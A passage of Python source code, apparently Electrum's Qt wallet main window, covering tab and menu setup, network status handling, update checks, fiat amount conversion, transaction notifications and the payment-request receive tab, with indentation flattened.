from .qrcodewidget import QRCodeWidget, QRDialog
from .qrtextedit import ShowQRTextEdit, ScanQRTextEdit
from .transaction_dialog import show_transaction
from .fee_slider import FeeSlider
from .util import (read_QIcon, ColorScheme, text_dialog, icon_path, WaitingDialog,
WindowModalDialog, ChoicesLayout, HelpLabel, FromList, Buttons,
OkButton, InfoButton, WWLabel, TaskThread, CancelButton,
CloseButton, HelpButton, MessageBoxMixin, EnterButton, expiration_values,
ButtonsLineEdit, CopyCloseButton, import_meta_gui, export_meta_gui,
filename_field, address_field)
from .installwizard import WIF_HELP_TEXT
from .history_list import HistoryList, HistoryModel
from .update_checker import UpdateCheck, UpdateCheckThread
class StatusBarButton(QPushButton):
def __init__(self, icon, tooltip, func):
QPushButton.__init__(self, icon, '')
self.setToolTip(tooltip)
self.setFlat(True)
self.setMaximumWidth(25)
self.clicked.connect(self.onPress)
self.func = func
self.setIconSize(QSize(25,25))
self.setCursor(QCursor(Qt.PointingHandCursor))
def onPress(self, checked=False):
'''Drops the unwanted PyQt5 "checked" argument'''
self.func()
def keyPressEvent(self, e):
if e.key() == Qt.Key_Return:
self.func()
from electrum.paymentrequest import PR_PAID
class ElectrumWindow(QMainWindow, MessageBoxMixin, Logger):
payment_request_ok_signal = pyqtSignal()
payment_request_error_signal = pyqtSignal()
new_fx_quotes_signal = pyqtSignal()
new_fx_history_signal = pyqtSignal()
network_signal = pyqtSignal(str, object)
alias_received_signal = pyqtSignal()
computing_privkeys_signal = pyqtSignal()
show_privkeys_signal = pyqtSignal()
def __init__(self, gui_object, wallet: Abstract_Wallet):
QMainWindow.__init__(self)
self.gui_object = gui_object
self.config = config = gui_object.config # type: SimpleConfig
self.gui_thread = gui_object.gui_thread
self.setup_exception_hook()
self.network = gui_object.daemon.network # type: Network
assert wallet, "no wallet"
self.wallet = wallet
self.fx = gui_object.daemon.fx # type: FxThread
self.invoices = wallet.invoices
self.contacts = wallet.contacts
self.tray = gui_object.tray
self.app = gui_object.app
self.cleaned_up = False
self.payment_request = None
self.checking_accounts = False
self.qr_window = None
self.not_enough_funds = False
self.pluginsdialog = None
self.require_fee_update = False
self.tl_windows = []
self.tx_external_keypairs = {}
Logger.__init__(self)
self.tx_notification_queue = queue.Queue()
self.tx_notification_last_time = 0
self.create_status_bar()
self.need_update = threading.Event()
self.decimal_point = config.get('decimal_point', DECIMAL_POINT_DEFAULT)
try:
decimal_point_to_base_unit_name(self.decimal_point)
except UnknownBaseUnit:
self.decimal_point = DECIMAL_POINT_DEFAULT
self.num_zeros = int(config.get('num_zeros', 0))
self.completions = QStringListModel()
self.tabs = tabs = QTabWidget(self)
self.send_tab = self.create_send_tab()
self.receive_tab = self.create_receive_tab()
self.addresses_tab = self.create_addresses_tab()
self.utxo_tab = self.create_utxo_tab()
self.console_tab = self.create_console_tab()
self.contacts_tab = self.create_contacts_tab()
tabs.addTab(self.create_history_tab(), read_QIcon("tab_history.png"), _('History'))
tabs.addTab(self.send_tab, read_QIcon("tab_send.png"), _('Send'))
tabs.addTab(self.receive_tab, read_QIcon("tab_receive.png"), _('Receive'))
def add_optional_tab(tabs, tab, icon, description, name):
tab.tab_icon = icon
tab.tab_description = description
tab.tab_pos = len(tabs)
tab.tab_name = name
if self.config.get('show_{}_tab'.format(name), False):
tabs.addTab(tab, icon, description.replace("&", ""))
add_optional_tab(tabs, self.addresses_tab, read_QIcon("tab_addresses.png"), _("&Addresses"), "addresses")
add_optional_tab(tabs, self.utxo_tab, read_QIcon("tab_coins.png"), _("Co&ins"), "utxo")
add_optional_tab(tabs, self.contacts_tab, read_QIcon("tab_contacts.png"), _("Con&tacts"), "contacts")
add_optional_tab(tabs, self.console_tab, read_QIcon("tab_console.png"), _("Con&sole"), "console")
tabs.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)
self.setCentralWidget(tabs)
if self.config.get("is_maximized"):
self.showMaximized()
self.setWindowIcon(read_QIcon("electrum.png"))
self.init_menubar()
wrtabs = weakref.proxy(tabs)
QShortcut(QKeySequence("Ctrl+W"), self, self.close)
QShortcut(QKeySequence("Ctrl+Q"), self, self.close)
QShortcut(QKeySequence("Ctrl+R"), self, self.update_wallet)
QShortcut(QKeySequence("F5"), self, self.update_wallet)
QShortcut(QKeySequence("Ctrl+PgUp"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() - 1)%wrtabs.count()))
QShortcut(QKeySequence("Ctrl+PgDown"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() + 1)%wrtabs.count()))
for i in range(wrtabs.count()):
QShortcut(QKeySequence("Alt+" + str(i + 1)), self, lambda i=i: wrtabs.setCurrentIndex(i))
self.payment_request_ok_signal.connect(self.payment_request_ok)
self.payment_request_error_signal.connect(self.payment_request_error)
self.history_list.setFocus(True)
# network callbacks
if self.network:
self.network_signal.connect(self.on_network_qt)
interests = ['wallet_updated', 'network_updated', 'blockchain_updated',
'new_transaction', 'status',
'banner', 'verified', 'fee', 'fee_histogram']
# To avoid leaking references to "self" that prevent the
# window from being GC-ed when closed, callbacks should be
# methods of this class only, and specifically not be
# partials, lambdas or methods of subobjects. Hence...
self.network.register_callback(self.on_network, interests)
# set initial message
self.console.showMessage(self.network.banner)
self.network.register_callback(self.on_quotes, ['on_quotes'])
self.network.register_callback(self.on_history, ['on_history'])
self.new_fx_quotes_signal.connect(self.on_fx_quotes)
self.new_fx_history_signal.connect(self.on_fx_history)
# update fee slider in case we missed the callback
self.fee_slider.update()
self.load_wallet(wallet)
gui_object.timer.timeout.connect(self.timer_actions)
self.fetch_alias()
# If the option hasn't been set yet
if config.get('check_updates') is None:
choice = QMessageBox.question(self,
"Electrum - " + _("Enable update check"),
_("For security reasons we advise that you always use the latest version of Electrum.") + " " +
_("Would you like to be notified when there is a newer version of Electrum available?"),
QMessageBox.Yes,
QMessageBox.No)
config.set_key('check_updates', choice == QMessageBox.Yes, save=True)
if config.get('check_updates', False):
# The references to both the thread and the window need to be stored somewhere
# to prevent GC from getting in our way.
def on_version_received(v):
if UpdateCheck.is_newer(v):
self.update_check_button.setText(_("Update to Electrum {} is available").format(v))
self.update_check_button.clicked.connect(lambda: self.show_update_check(v))
self.update_check_button.show()
self._update_check_thread = UpdateCheckThread(self)
self._update_check_thread.checked.connect(on_version_received)
self._update_check_thread.start()
def on_history(self, b):
self.wallet.clear_coin_price_cache()
self.new_fx_history_signal.emit()
def setup_exception_hook(self):
Exception_Hook(self)
def on_fx_history(self):
self.history_model.refresh('fx_history')
self.address_list.update()
def on_quotes(self, b):
self.new_fx_quotes_signal.emit()
def on_fx_quotes(self):
self.update_status()
# Refresh edits with the new rate
edit = self.fiat_send_e if self.fiat_send_e.is_last_edited else self.amount_e
edit.textEdited.emit(edit.text())
edit = self.fiat_receive_e if self.fiat_receive_e.is_last_edited else self.receive_amount_e
edit.textEdited.emit(edit.text())
# History tab needs updating if it used spot
if self.fx.history_used_spot:
self.history_model.refresh('fx_quotes')
self.address_list.update()
def toggle_tab(self, tab):
show = not self.config.get('show_{}_tab'.format(tab.tab_name), False)
self.config.set_key('show_{}_tab'.format(tab.tab_name), show)
item_text = (_("Hide {}") if show else _("Show {}")).format(tab.tab_description)
tab.menu_action.setText(item_text)
if show:
# Find out where to place the tab
index = len(self.tabs)
for i in range(len(self.tabs)):
try:
if tab.tab_pos < self.tabs.widget(i).tab_pos:
index = i
break
except AttributeError:
pass
self.tabs.insertTab(index, tab, tab.tab_icon, tab.tab_description.replace("&", ""))
else:
i = self.tabs.indexOf(tab)
self.tabs.removeTab(i)
def push_top_level_window(self, window):
'''Used for e.g. tx dialog box to ensure new dialogs are appropriately
parented. This used to be done by explicitly providing the parent
window, but that isn't something hardware wallet prompts know.'''
self.tl_windows.append(window)
def pop_top_level_window(self, window):
self.tl_windows.remove(window)
def top_level_window(self, test_func=None):
'''Do the right thing in the presence of tx dialog windows'''
override = self.tl_windows[-1] if self.tl_windows else None
if override and test_func and not test_func(override):
override = None # only override if ok for test_func
return self.top_level_window_recurse(override, test_func)
def diagnostic_name(self):
#return '{}:{}'.format(self.__class__.__name__, self.wallet.diagnostic_name())
return self.wallet.diagnostic_name()
def is_hidden(self):
return self.isMinimized() or self.isHidden()
def show_or_hide(self):
if self.is_hidden():
self.bring_to_top()
else:
self.hide()
def bring_to_top(self):
self.show()
self.raise_()
def on_error(self, exc_info):
e = exc_info[1]
if isinstance(e, UserCancelled):
pass
elif isinstance(e, UserFacingException):
self.show_error(str(e))
else:
try:
self.logger.error("on_error", exc_info=exc_info)
except OSError:
pass # see #4418
self.show_error(str(e))
def on_network(self, event, *args):
if event == 'wallet_updated':
wallet = args[0]
if wallet == self.wallet:
self.need_update.set()
elif event == 'network_updated':
self.gui_object.network_updated_signal_obj.network_updated_signal \
.emit(event, args)
self.network_signal.emit('status', None)
elif event == 'blockchain_updated':
# to update number of confirmations in history
self.need_update.set()
elif event == 'new_transaction':
wallet, tx = args
if wallet == self.wallet:
self.tx_notification_queue.put(tx)
elif event in ['status', 'banner', 'verified', 'fee', 'fee_histogram']:
# Handle in GUI thread
self.network_signal.emit(event, args)
else:
self.logger.info(f"unexpected network message: {event} {args}")
def on_network_qt(self, event, args=None):
# Handle a network message in the GUI thread
if event == 'status':
self.update_status()
elif event == 'banner':
self.console.showMessage(args[0])
elif event == 'verified':
wallet, tx_hash, tx_mined_status = args
if wallet == self.wallet:
self.history_model.update_tx_mined_status(tx_hash, tx_mined_status)
elif event == 'fee':
if self.config.is_dynfee():
self.fee_slider.update()
self.require_fee_update = True
elif event == 'fee_histogram':
if self.config.is_dynfee():
self.fee_slider.update()
self.require_fee_update = True
self.history_model.on_fee_histogram()
else:
self.logger.info(f"unexpected network_qt signal: {event} {args}")
def fetch_alias(self):
self.alias_info = None
alias = self.config.get('alias')
if alias:
alias = str(alias)
def f():
self.alias_info = self.contacts.resolve_openalias(alias)
self.alias_received_signal.emit()
t = threading.Thread(target=f)
t.setDaemon(True)
t.start()
def close_wallet(self):
if self.wallet:
self.logger.info(f'close_wallet {self.wallet.storage.path}')
run_hook('close_wallet', self.wallet)
@profiler
def load_wallet(self, wallet):
wallet.thread = TaskThread(self, self.on_error)
self.update_recently_visited(wallet.storage.path)
self.need_update.set()
# Once GUI has been initialized check if we want to announce something since the callback has been called before the GUI was initialized
# update menus
self.seed_menu.setEnabled(self.wallet.has_seed())
self.update_lock_icon()
self.update_buttons_on_seed()
self.update_console()
self.clear_receive_tab()
self.request_list.update()
self.tabs.show()
self.init_geometry()
if self.config.get('hide_gui') and self.gui_object.tray.isVisible():
self.hide()
else:
self.show()
self.watching_only_changed()
run_hook('load_wallet', wallet, self)
try:
wallet.try_detecting_internal_addresses_corruption()
except InternalAddressCorruption as e:
self.show_error(str(e))
send_exception_to_crash_reporter(e)
def init_geometry(self):
winpos = self.wallet.storage.get("winpos-qt")
try:
screen = self.app.desktop().screenGeometry()
assert screen.contains(QRect(*winpos))
self.setGeometry(*winpos)
except:
self.logger.info("using default geometry")
self.setGeometry(100, 100, 840, 400)
def watching_only_changed(self):
name = "Electrum Testnet" if constants.net.TESTNET else "Electrum"
title = '%s %s - %s' % (name, ELECTRUM_VERSION,
self.wallet.basename())
extra = [self.wallet.storage.get('wallet_type', '?')]
if self.wallet.is_watching_only():
extra.append(_('watching only'))
title += ' [%s]'% ', '.join(extra)
self.setWindowTitle(title)
self.password_menu.setEnabled(self.wallet.may_have_password())
self.import_privkey_menu.setVisible(self.wallet.can_import_privkey())
self.import_address_menu.setVisible(self.wallet.can_import_address())
self.export_menu.setEnabled(self.wallet.can_export())
def warn_if_watching_only(self):
if self.wallet.is_watching_only():
msg = ' '.join([
_("This wallet is watching-only."),
_("This means you will not be able to spend Bitcoins with it."),
_("Make sure you own the seed phrase or the private keys, before you request Bitcoins to be sent to this wallet.")
])
self.show_warning(msg, title=_('Watch-only wallet'))
def warn_if_testnet(self):
if not constants.net.TESTNET:
return
# user might have opted out already
if self.config.get('dont_show_testnet_warning', False):
return
# only show once per process lifecycle
if getattr(self.gui_object, '_warned_testnet', False):
return
self.gui_object._warned_testnet = True
msg = ''.join([
_("You are in testnet mode."), ' ',
_("Testnet coins are worthless."), '\n',
_("Testnet is separate from the main Bitcoin network. It is used for testing.")
])
cb = QCheckBox(_("Don't show this again."))
cb_checked = False
def on_cb(x):
nonlocal cb_checked
cb_checked = x == Qt.Checked
cb.stateChanged.connect(on_cb)
self.show_warning(msg, title=_('Testnet'), checkbox=cb)
if cb_checked:
self.config.set_key('dont_show_testnet_warning', True)
def open_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
filename, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
if not filename:
return
self.gui_object.new_window(filename)
def backup_wallet(self):
path = self.wallet.storage.path
wallet_folder = os.path.dirname(path)
filename, __ = QFileDialog.getSaveFileName(self, _('Enter a filename for the copy of your wallet'), wallet_folder)
if not filename:
return
new_path = os.path.join(wallet_folder, filename)
if new_path != path:
try:
shutil.copy2(path, new_path)
self.show_message(_("A copy of your wallet file was created in")+" '%s'" % str(new_path), title=_("Wallet backup created"))
except BaseException as reason:
self.show_critical(_("Electrum was unable to copy your wallet file to the specified location.") + "\n" + str(reason), title=_("Unable to create backup"))
def update_recently_visited(self, filename):
recent = self.config.get('recently_open', [])
try:
sorted(recent)
except:
recent = []
if filename in recent:
recent.remove(filename)
recent.insert(0, filename)
recent = [path for path in recent if os.path.exists(path)]
recent = recent[:5]
self.config.set_key('recently_open', recent)
self.recently_visited_menu.clear()
for i, k in enumerate(sorted(recent)):
b = os.path.basename(k)
def loader(k):
return lambda: self.gui_object.new_window(k)
self.recently_visited_menu.addAction(b, loader(k)).setShortcut(QKeySequence("Ctrl+%d"%(i+1)))
self.recently_visited_menu.setEnabled(len(recent))
def get_wallet_folder(self):
return os.path.dirname(os.path.abspath(self.config.get_wallet_path()))
def new_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
filename = get_new_wallet_name(wallet_folder)
full_path = os.path.join(wallet_folder, filename)
self.gui_object.start_new_window(full_path, None)
def init_menubar(self):
menubar = QMenuBar()
file_menu = menubar.addMenu(_("&File"))
self.recently_visited_menu = file_menu.addMenu(_("&Recently open"))
file_menu.addAction(_("&Open"), self.open_wallet).setShortcut(QKeySequence.Open)
file_menu.addAction(_("&New/Restore"), self.new_wallet).setShortcut(QKeySequence.New)
file_menu.addAction(_("&Save Copy"), self.backup_wallet).setShortcut(QKeySequence.SaveAs)
file_menu.addAction(_("Delete"), self.remove_wallet)
file_menu.addSeparator()
file_menu.addAction(_("&Quit"), self.close)
wallet_menu = menubar.addMenu(_("&Wallet"))
wallet_menu.addAction(_("&Information"), self.show_master_public_keys)
wallet_menu.addSeparator()
self.password_menu = wallet_menu.addAction(_("&Password"), self.change_password_dialog)
self.seed_menu = wallet_menu.addAction(_("&Seed"), self.show_seed_dialog)
self.private_keys_menu = wallet_menu.addMenu(_("&Private keys"))
self.private_keys_menu.addAction(_("&Sweep"), self.sweep_key_dialog)
self.import_privkey_menu = self.private_keys_menu.addAction(_("&Import"), self.do_import_privkey)
self.export_menu = self.private_keys_menu.addAction(_("&Export"), self.export_privkeys_dialog)
self.import_address_menu = wallet_menu.addAction(_("Import addresses"), self.import_addresses)
wallet_menu.addSeparator()
addresses_menu = wallet_menu.addMenu(_("&Addresses"))
addresses_menu.addAction(_("&Filter"), lambda: self.address_list.toggle_toolbar(self.config))
labels_menu = wallet_menu.addMenu(_("&Labels"))
labels_menu.addAction(_("&Import"), self.do_import_labels)
labels_menu.addAction(_("&Export"), self.do_export_labels)
history_menu = wallet_menu.addMenu(_("&History"))
history_menu.addAction(_("&Filter"), lambda: self.history_list.toggle_toolbar(self.config))
history_menu.addAction(_("&Summary"), self.history_list.show_summary)
history_menu.addAction(_("&Plot"), self.history_list.plot_history_dialog)
history_menu.addAction(_("&Export"), self.history_list.export_history_dialog)
contacts_menu = wallet_menu.addMenu(_("Contacts"))
contacts_menu.addAction(_("&New"), self.new_contact_dialog)
contacts_menu.addAction(_("Import"), lambda: self.contact_list.import_contacts())
contacts_menu.addAction(_("Export"), lambda: self.contact_list.export_contacts())
invoices_menu = wallet_menu.addMenu(_("Invoices"))
invoices_menu.addAction(_("Import"), lambda: self.invoice_list.import_invoices())
invoices_menu.addAction(_("Export"), lambda: self.invoice_list.export_invoices())
wallet_menu.addSeparator()
wallet_menu.addAction(_("Find"), self.toggle_search).setShortcut(QKeySequence("Ctrl+F"))
def add_toggle_action(view_menu, tab):
is_shown = self.config.get('show_{}_tab'.format(tab.tab_name), False)
item_name = (_("Hide") if is_shown else _("Show")) + " " + tab.tab_description
tab.menu_action = view_menu.addAction(item_name, lambda: self.toggle_tab(tab))
view_menu = menubar.addMenu(_("&View"))
add_toggle_action(view_menu, self.addresses_tab)
add_toggle_action(view_menu, self.utxo_tab)
add_toggle_action(view_menu, self.contacts_tab)
add_toggle_action(view_menu, self.console_tab)
tools_menu = menubar.addMenu(_("&Tools"))
# Settings / Preferences are all reserved keywords in macOS using this as work around
tools_menu.addAction(_("Electrum preferences") if sys.platform == 'darwin' else _("Preferences"), self.settings_dialog)
tools_menu.addAction(_("&Network"), lambda: self.gui_object.show_network_dialog(self))
tools_menu.addAction(_("&Plugins"), self.plugins_dialog)
tools_menu.addSeparator()
tools_menu.addAction(_("&Sign/verify message"), self.sign_verify_message)
tools_menu.addAction(_("&Encrypt/decrypt message"), self.encrypt_message)
tools_menu.addSeparator()
paytomany_menu = tools_menu.addAction(_("&Pay to many"), self.paytomany)
raw_transaction_menu = tools_menu.addMenu(_("&Load transaction"))
raw_transaction_menu.addAction(_("&From file"), self.do_process_from_file)
raw_transaction_menu.addAction(_("&From text"), self.do_process_from_text)
raw_transaction_menu.addAction(_("&From the blockchain"), self.do_process_from_txid)
raw_transaction_menu.addAction(_("&From QR code"), self.read_tx_from_qrcode)
self.raw_transaction_menu = raw_transaction_menu
run_hook('init_menubar_tools', self, tools_menu)
help_menu = menubar.addMenu(_("&Help"))
help_menu.addAction(_("&About"), self.show_about)
help_menu.addAction(_("&Check for updates"), self.show_update_check)
help_menu.addAction(_("&Official website"), lambda: webbrowser.open("https://electrum.org"))
help_menu.addSeparator()
help_menu.addAction(_("&Documentation"), lambda: webbrowser.open("http://docs.electrum.org/")).setShortcut(QKeySequence.HelpContents)
help_menu.addAction(_("&Report Bug"), self.show_report_bug)
help_menu.addSeparator()
help_menu.addAction(_("&Donate to server"), self.donate_to_server)
self.setMenuBar(menubar)
def donate_to_server(self):
d = self.network.get_donation_address()
if d:
host = self.network.get_parameters().host
self.pay_to_URI('bitcoin:%s?message=donation for %s'%(d, host))
else:
self.show_error(_('No donation address for this server'))
def show_about(self):
QMessageBox.about(self, "Electrum",
(_("Version")+" %s" % ELECTRUM_VERSION + "\n\n" +
_("Electrum's focus is speed, with low resource usage and simplifying Bitcoin.") + " " +
_("You do not need to perform regular backups, because your wallet can be "
"recovered from a secret phrase that you can memorize or write on paper.") + " " +
_("Startup times are instant because it operates in conjunction with high-performance "
"servers that handle the most complicated parts of the Bitcoin system.") + "\n\n" +
_("Uses icons from the Icons8 icon pack (icons8.com).")))
def show_update_check(self, version=None):
self.gui_object._update_check = UpdateCheck(self, version)
def show_report_bug(self):
msg = ' '.join([
_("Please report any bugs as issues on github:<br/>"),
"<a href=\"https://github.com/spesmilo/electrum/issues\">https://github.com/spesmilo/electrum/issues</a><br/><br/>",
_("Before reporting a bug, upgrade to the most recent version of Electrum (latest release or git HEAD), and include the version number in your report."),
_("Try to explain not only what the bug is, but how it occurs.")
])
self.show_message(msg, title="Electrum - " + _("Reporting Bugs"), rich_text=True)
def notify_transactions(self):
if self.tx_notification_queue.qsize() == 0:
return
if not self.wallet.up_to_date:
return # no notifications while syncing
now = time.time()
rate_limit = 20 # seconds
if self.tx_notification_last_time + rate_limit > now:
return
self.tx_notification_last_time = now
self.logger.info("Notifying GUI about new transactions")
txns = []
while True:
try:
txns.append(self.tx_notification_queue.get_nowait())
except queue.Empty:
break
# Combine the transactions if there are at least three
if len(txns) >= 3:
total_amount = 0
for tx in txns:
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
if not is_relevant:
continue
total_amount += v
self.notify(_("{} new transactions: Total amount received in the new transactions {}")
.format(len(txns), self.format_amount_and_units(total_amount)))
else:
for tx in txns:
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
if not is_relevant:
continue
self.notify(_("New transaction: {}").format(self.format_amount_and_units(v)))
def notify(self, message):
if self.tray:
try:
# this requires Qt 5.9
self.tray.showMessage("Electrum", message, read_QIcon("electrum_dark_icon"), 20000)
except TypeError:
self.tray.showMessage("Electrum", message, QSystemTrayIcon.Information, 20000)
# custom wrappers for getOpenFileName and getSaveFileName, that remember the path selected by the user
def getOpenFileName(self, title, filter = ""):
directory = self.config.get('io_dir', os.path.expanduser('~'))
fileName, __ = QFileDialog.getOpenFileName(self, title, directory, filter)
if fileName and directory != os.path.dirname(fileName):
self.config.set_key('io_dir', os.path.dirname(fileName), True)
return fileName
def getSaveFileName(self, title, filename, filter = ""):
directory = self.config.get('io_dir', os.path.expanduser('~'))
path = os.path.join( directory, filename )
fileName, __ = QFileDialog.getSaveFileName(self, title, path, filter)
if fileName and directory != os.path.dirname(fileName):
self.config.set_key('io_dir', os.path.dirname(fileName), True)
return fileName
def timer_actions(self):
# Note this runs in the GUI thread
if self.need_update.is_set():
self.need_update.clear()
self.update_wallet()
# resolve aliases
# FIXME this is a blocking network call that has a timeout of 5 sec
self.payto_e.resolve()
# update fee
if self.require_fee_update:
self.do_update_fee()
self.require_fee_update = False
self.notify_transactions()
def format_amount(self, x, is_diff=False, whitespaces=False):
return format_satoshis(x, self.num_zeros, self.decimal_point, is_diff=is_diff, whitespaces=whitespaces)
def format_amount_and_units(self, amount):
text = self.format_amount(amount) + ' '+ self.base_unit()
x = self.fx.format_amount_and_units(amount) if self.fx else None
if text and x:
text += ' (%s)'%x
return text
def format_fee_rate(self, fee_rate):
# fee_rate is in sat/kB
return format_fee_satoshis(fee_rate/1000, num_zeros=self.num_zeros) + ' sat/byte'
def get_decimal_point(self):
return self.decimal_point
def base_unit(self):
return decimal_point_to_base_unit_name(self.decimal_point)
def connect_fields(self, window, btc_e, fiat_e, fee_e):
def edit_changed(edit):
if edit.follows:
return
edit.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet())
fiat_e.is_last_edited = (edit == fiat_e)
amount = edit.get_amount()
rate = self.fx.exchange_rate() if self.fx else Decimal('NaN')
if rate.is_nan() or amount is None:
if edit is fiat_e:
btc_e.setText("")
if fee_e:
fee_e.setText("")
else:
fiat_e.setText("")
else:
if edit is fiat_e:
btc_e.follows = True
btc_e.setAmount(int(amount / Decimal(rate) * COIN))
btc_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
btc_e.follows = False
if fee_e:
window.update_fee()
else:
fiat_e.follows = True
fiat_e.setText(self.fx.ccy_amount_str(
amount * Decimal(rate) / COIN, False))
fiat_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
fiat_e.follows = False
btc_e.follows = False
fiat_e.follows = False
fiat_e.textChanged.connect(partial(edit_changed, fiat_e))
btc_e.textChanged.connect(partial(edit_changed, btc_e))
fiat_e.is_last_edited = False
def update_status(self):
if not self.wallet:
return
if self.network is None:
text = _("Offline")
icon = read_QIcon("status_disconnected.png")
elif self.network.is_connected():
server_height = self.network.get_server_height()
server_lag = self.network.get_local_height() - server_height
fork_str = "_fork" if len(self.network.get_blockchains())>1 else ""
# Server height can be 0 after switching to a new server
# until we get a headers subscription request response.
# Display the synchronizing message in that case.
if not self.wallet.up_to_date or server_height == 0:
text = _("Synchronizing...")
icon = read_QIcon("status_waiting.png")
elif server_lag > 1:
text = _("Server is lagging ({} blocks)").format(server_lag)
icon = read_QIcon("status_lagging%s.png"%fork_str)
else:
c, u, x = self.wallet.get_balance()
text = _("Balance" ) + ": %s "%(self.format_amount_and_units(c))
if u:
text += " [%s unconfirmed]"%(self.format_amount(u, is_diff=True).strip())
if x:
text += " [%s unmatured]"%(self.format_amount(x, is_diff=True).strip())
# append fiat balance and price
if self.fx.is_enabled():
text += self.fx.get_fiat_status_text(c + u + x,
self.base_unit(), self.get_decimal_point()) or ''
if not self.network.proxy:
icon = read_QIcon("status_connected%s.png"%fork_str)
else:
icon = read_QIcon("status_connected_proxy%s.png"%fork_str)
else:
if self.network.proxy:
text = "{} ({})".format(_("Not connected"), _("proxy enabled"))
else:
text = _("Not connected")
icon = read_QIcon("status_disconnected.png")
self.tray.setToolTip("%s (%s)" % (text, self.wallet.basename()))
self.balance_label.setText(text)
self.status_button.setIcon( icon )
def update_wallet(self):
self.update_status()
if self.wallet.up_to_date or not self.network or not self.network.is_connected():
self.update_tabs()
def update_tabs(self, wallet=None):
if wallet is None:
wallet = self.wallet
if wallet != self.wallet:
return
self.history_model.refresh('update_tabs')
self.request_list.update()
self.address_list.update()
self.utxo_list.update()
self.contact_list.update()
self.invoice_list.update()
self.update_completions()
def create_history_tab(self):
self.history_model = HistoryModel(self)
self.history_list = l = HistoryList(self, self.history_model)
self.history_model.set_view(self.history_list)
l.searchable_list = l
toolbar = l.create_toolbar(self.config)
toolbar_shown = self.config.get('show_toolbar_history', False)
l.show_toolbar(toolbar_shown)
return self.create_list_tab(l, toolbar)
def show_address(self, addr):
from . import address_dialog
d = address_dialog.AddressDialog(self, addr)
d.exec_()
def show_transaction(self, tx, tx_desc = None):
'''tx_desc is set only for txs created in the Send tab'''
show_transaction(tx, self, tx_desc)
def create_receive_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.receive_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
self.receive_address_e = ButtonsLineEdit()
self.receive_address_e.addCopyButton(self.app)
self.receive_address_e.setReadOnly(True)
msg = _('Bitcoin address where the payment should be received. Note that each payment request uses a different Bitcoin address.')
self.receive_address_label = HelpLabel(_('Receiving address'), msg)
self.receive_address_e.textChanged.connect(self.update_receive_qr)
self.receive_address_e.setFocusPolicy(Qt.ClickFocus)
grid.addWidget(self.receive_address_label, 0, 0)
grid.addWidget(self.receive_address_e, 0, 1, 1, -1)
self.receive_message_e = QLineEdit()
grid.addWidget(QLabel(_('Description')), 1, 0)
grid.addWidget(self.receive_message_e, 1, 1, 1, -1)
self.receive_message_e.textChanged.connect(self.update_receive_qr)
self.receive_amount_e = BTCAmountEdit(self.get_decimal_point)
grid.addWidget(QLabel(_('Requested amount')), 2, 0)
grid.addWidget(self.receive_amount_e, 2, 1)
self.receive_amount_e.textChanged.connect(self.update_receive_qr)
self.fiat_receive_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_receive_e.setVisible(False)
grid.addWidget(self.fiat_receive_e, 2, 2, Qt.AlignLeft)
self.connect_fields(self, self.receive_amount_e, self.fiat_receive_e, None)
self.expires_combo = QComboBox()
self.expires_combo.addItems([i[0] for i in expiration_values])
self.expires_combo.setCurrentIndex(3)
self.expires_combo.setFixedWidth(self.receive_amount_e.width())
msg = ' '.join([
_('Expiration date of your request.'),
_('This information is seen by the recipient if you send them a signed payment request.'),
_('Expired requests have to be deleted manually from your list, in order to free the corresponding Bitcoin addresses.'),
_('The bitcoin address never expires and will always be part of this electrum wallet.'),
])
grid.addWidget(HelpLabel(_('Request expires'), msg), 3, 0)
grid.addWidget(self.expires_combo, 3, 1)
self.expires_label = QLineEdit('')
self.expires_label.setReadOnly(1)
self.expires_label.setFocusPolicy(Qt.NoFocus)
self.expires_label.hide()
grid.addWidget(self.expires_label, 3, 1)
self.save_request_button = QPushButton(_('Save'))
self.save_request_button.clicked.connect(self.save_payment_request)
self.new_request_button = QPushButton(_('New'))
self.new_request_button.clicked.connect(self.new_payment_request)
self.receive_qr = QRCodeWidget(fixedSize=200)
self.receive_qr.mouseReleaseEvent = lambda x: self.toggle_qr_window()
self.receive_qr.enterEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.PointingHandCursor))
self.receive_qr.leaveEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.ArrowCursor))
self.receive_buttons = buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.save_request_button)
buttons.addWidget(self.new_request_button)
grid.addLayout(buttons, 4, 1, 1, 2)
self.receive_requests_label = QLabel(_('Requests'))
from .request_list import RequestList
self.request_list = RequestList(self)
# layout
vbox_g = QVBoxLayout()
vbox_g.addLayout(grid)
vbox_g.addStretch()
hbox = QHBoxLayout()
hbox.addLayout(vbox_g)
hbox.addWidget(self.receive_qr)
w = QWidget()
w.searchable_list = self.request_list
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.receive_requests_label)
vbox.addWidget(self.request_list)
vbox.setStretchFactor(self.request_list, 1000)
return w
def delete_payment_request(self, addr):
self.wallet.remove_payment_request(addr, self.config)
self.request_list.update()
self.clear_receive_tab()
def get_request_URI(self, addr):
req = self.wallet.receive_requests[addr]
message = self.wallet.labels.get(addr, '')
amount = req['amount']
extra_query_params = {}
if req.get('time'):
extra_query_params['time'] = str(int(req.get('time')))
if req.get('exp'):
extra_query_params['exp'] = str(int(req.get('exp')))
if req.get('name') and req.get('sig'):
sig = bfh(req.get('sig'))
sig = bitcoin.base_encode(sig, base=58)
extra_query_params['name'] = req['name']
extra_query_params['sig'] = sig
uri = util.create_bip21_uri(addr, amount, message, extra_query_params=extra_query_params)
return str(uri)
def sign_payment_request(self, addr):
alias = self.config.get('alias')
